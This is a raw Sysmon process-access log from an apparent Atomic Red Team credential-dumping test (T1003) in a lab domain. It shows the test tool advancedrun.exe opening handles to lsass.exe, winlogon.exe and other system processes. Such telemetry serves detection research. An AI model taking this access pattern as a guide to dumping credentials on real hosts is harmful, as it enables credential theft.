17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952185Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003952184Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952183Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952182Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952181Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952180Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952179Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952178Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952177Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952175Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952173Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952172Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952170Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952168Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952167Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 